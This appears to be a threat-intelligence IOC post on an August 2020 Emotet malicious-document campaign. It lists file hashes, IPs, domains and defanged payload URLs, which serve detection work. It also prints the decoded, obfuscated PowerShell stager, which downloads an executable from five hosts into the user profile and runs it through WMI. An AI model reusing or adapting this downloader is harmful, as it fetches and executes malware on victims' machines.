Emotet_Doc_out_2020-08-12_02_28.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4.  
5. b6d061764b57ecc2c5baa7dc8771eca3169e033c4fcecc9eed583228e6c43c7d
6. f9cb0402ef5b42e9a6b622ff9c0e6a3e70c9a47083795919cdc6ddc63bbef5e5
7. 719b3c1717f939215cca7ee3393ef396cb0f8d745750b24781439a14d3e61013
8. cfad89dc0acb6ca9fb8d2a7c688b9bf6148ad1e44b78413a8f4e207315bb9088
9. 293ea71fa7f0d9d434dc99654659752447329452e66c7d5b11ab94ba0686af07
10. a129a1fe3a51426aa403edd27234affe627420b8e6f87c05859de900bc8cbcf8
11. 68cb1a8d254ca797461e7856e16deb8703d637e12d6ffae4936bd61b18c1eb9d
12. f250036a8f70c0d3c21d3fe9d60127b45879746797a2bbe697334d2576b3ab75
13. 18224ef1abb9fcfa1b9abe909618cc7df37889554727bd37df5aba095a0b9cbe
14. d10bdbfd907f6947fd0d46be5fe73d817a74784ed3aa0af5df00ed33544a6362
15. 6d584a1d74621185d8158f5409f1818fbfe0ba0f83bb0c4d1364f0e694fa4119
16. 540c24389f7908941efde04da2d0b9aecc64c53b0b64a81021ff1e5a55892a6c
17. 129fc005ca8b2794233ec326ef6d75001c2084dbddaae65e267284f40fde3744
18. bf5cdad7e4473322d05b6b9d00963b809b5767270d150bf3fbc80369baa5db65
19. 5c3c78999fae5042beddf41da3857172070c10e2203e27c51330732967243ec1
20. 5040ae89dfcdf457fef0e33ae7f6d1df1cb8d97bcce8e3afe92c73148eb8d648
21. ef7d42870ae9136798deaa7e169be4e7b5658a42450690c79fd0b608c62dfd18
22. aa8d5d68477493748dbd276eddf4cf0cbe8e3eea559eceb6b60e03d9b2cb8d61
23. 136ea2d85935a084e96025d09f475c97eeda378c7fb42a2b621fc77b13d5cc2f
24. 09c0cfa26f4cd0d4f01151f9ef2aca99770e124d6f31d23ec40a9a419f305a52
25. 59c0eb17a6928f0d5a9c1bb79ff1de6b854de12390cff96feb32aa0622010c0f
26. 1d1300efc6cb899350ac45e811810a274d09d6c0046413390aa12d7bf2f94803
27. 5c7e33c23d454291dacaf4ae431d451d0659a56b3cf2e2a0ed82002b5ee21bdc
28. b2cfd206679ad3d17bac7cfe788e8b30ed2c5ad2a52856a6a353c6df94f9f751
29. 98d1ef605c5aaf3bc9405c84661e7fad8a677276231e3d63ef0a3fc4ddb0a8b6
30. 96493e2b3256bad964338af06464b36ddd2f467b812bdd3c357b3e5b28eeed99
31. b1f8969e58efd76050984231fb0734bc862f8ff61ffe3815a5fab1f0e2d35c5f
32. ad28e501b49533c792f360ac328a29b986059f15d6d17d3b37d53b412bb03314
33. 123d3d66a18c61a68b9c7ce1e927aa1e59d7b04d1ce35e6a1b66edb0b1dd05f2
34.  
35.  
36. IPs:
37. 110.4.45.182
38. 149.255.62.70
39. 162.144.134.38
40. 208.86.155.52
41. 91.148.168.34
42.  
43. Domains:
44.  
45. dutarini.com
46. ecorideen.ncryptedprojects.com
47. emediserv.com
48. enviglobe.com
49. expart.com
50.  
51.  
52. hxxp://dutarini.com/cgi-bin/Sz012521/
53. hxxps://ecorideen.ncryptedprojects.com/cron-nct/Mmgmv/
54. hxxp://enviglobe.com/wp-admin/ItqH87993/
55. hxxps://expart.com/internal/yS54480/
56. hxxp://emediserv.com/vra/ulD/
57.  
58.  
59. Decoded Base64 Powershell:
60. $ZSFAAeob='FPDBIpcm';
61. [Net.ServicePointManager]::"securIT`yp`R`OtoCol" = 'tls12, tls11, tls';
62. $XPRABriq = '813';
63. $MWVCOktv='FZZPMxqs';
64. $FJUHYrbn=$env:userprofile+'\'+$XPRABriq+'.exe';
65. $FJQSXevy='WGBYPwkd';
66. $NGUYAvse=&('n'+'ew-o'+'bject') neT.webcLIeNT;
67. $UUMECoql='hxxp://dutarini.com/cgi-bin/Sz012521/
68. hxxps://ecorideen.ncryptedprojects.com/cron-nct/Mmgmv/
69. hxxp://enviglobe.com/wp-admin/ItqH87993/
70. hxxps://expart.com/internal/yS54480/
71. hxxp://emediserv.com/vra/ulD/'."sp`lit"([char]42);
72. $DPQQHihw='GARDSwng';
73. foreach($FBRXCtpl in $UUMECoql){try{$NGUYAvse."DOwn`l`oAdFi`Le"($FBRXCtpl, $FJUHYrbn);
74. $HUYQHqjw='GGKDEixm';
75. If ((&('G'+'et'+'-Item') $FJUHYrbn)."Le`N`GTH" -ge 22372) {([wmiclass]'win32_Process')."C`RE`AtE"($FJUHYrbn);
76. $PCHLBqpx='TOEKIkdj';
77. break;
78. $NIZHKtap='CVJFFtpr'}}catch{}}$AIXZRszd='BWBSBywz'
79.